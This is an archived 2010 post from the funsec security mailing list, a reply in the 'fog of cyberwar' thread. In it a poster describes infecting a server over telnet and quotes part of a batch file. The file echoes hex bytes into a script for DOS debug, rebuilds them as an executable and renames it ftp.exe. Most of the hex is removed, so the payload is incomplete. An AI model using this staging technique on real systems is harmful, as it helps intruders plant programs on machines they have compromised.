funsec mailing list archives
Re: fog of cyberwar
From: "Joel Helgeson" <joel () helgeson com>
Date: Sat, 23 Jan 2010 19:18:10 -0600
Actually, I've infected a server via telnet before, by echoing hex strings to a text file, then using debug to convert to an exe. One could just as easily use any other executable... <----contents of ftp.bat ----> @ECHO OFF>1 echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00>>1 echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00>>1 echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00>>1 echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68>>1 <---- Lines Deleted ----> echo e 44E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo e 44F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo rcx>>1 echo 4400>>1 echo n ftp.sys>>1 echo w>>1 echo q>>1 debug<1>nul rename ftp.sys ftp.exe </----contents of ftp.bat ----> Joel Helgeson -----Original Message----- From: funsec-bounces () linuxbox org [mailto:funsec-bounces () linuxbox org] On Behalf Of Dan Kaminsky Sent: Friday, January 22, 2010 1:15 PM To: Vaughn, Randal L. Cc: funsec () linuxbox org; Rich Kulawiec Subject: Re: [funsec] fog of cyberwar Actually, against telnet you just push the console echo attacks and kill the session. On Fri, Jan 22, 2010 at 8:03 PM, Vaughn, Randal L. <RL_Vaughn () baylor edu> wrote:
telnet? On Jan 22, 2010, at 9:45 AM, Dan Kaminsky wrote:IE should not be used anymore? What took you so long?Anybody still using IE doesn't deserve any help, any sympathy, any support. They are deliberately setting themselves on fire -- so let them burn.So which browser exactly is the secure one? _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Re: fog of cyberwar, (continued)
- Re: fog of cyberwar Benjamin Brown (Jan 22)
- Re: fog of cyberwar Rob, grandpa of Ryan, Trevor, Devon & Hannah (Jan 22)
- Re: fog of cyberwar steve pirk [egrep] (Jan 22)
- Re: fog of cyberwar Dan Kaminsky (Jan 22)
- Re: fog of cyberwar steve pirk [egrep] (Jan 22)
- Re: fog of cyberwar Vaughn, Randal L. (Jan 22)
- Re: fog of cyberwar Dan Kaminsky (Jan 22)
- Re: fog of cyberwar Gadi Evron (Jan 22)
- Re: fog of cyberwar Dan Kaminsky (Jan 22)
- Re: fog of cyberwar Gadi Evron (Jan 22)
- Re: fog of cyberwar Joel Helgeson (Jan 23)
- Re: fog of cyberwar Vaughn, Randal L. (Jan 22)
- Re: fog of cyberwar Rich Kulawiec (Jan 22)
- Re: fog of cyberwar Gadi Evron (Jan 22)
- Re: fog of cyberwar phester (Jan 23)
- Re: fog of cyberwar Rich Kulawiec (Jan 23)
- Re: fog of cyberwar Gadi Evron (Jan 23)
- Re: fog of cyberwar Jason Lewis (Jan 24)
- Re: fog of cyberwar Dan White (Jan 24)
- Re: fog of cyberwar phester (Jan 24)
- Re: fog of cyberwar steve pirk [egrep] (Jan 24)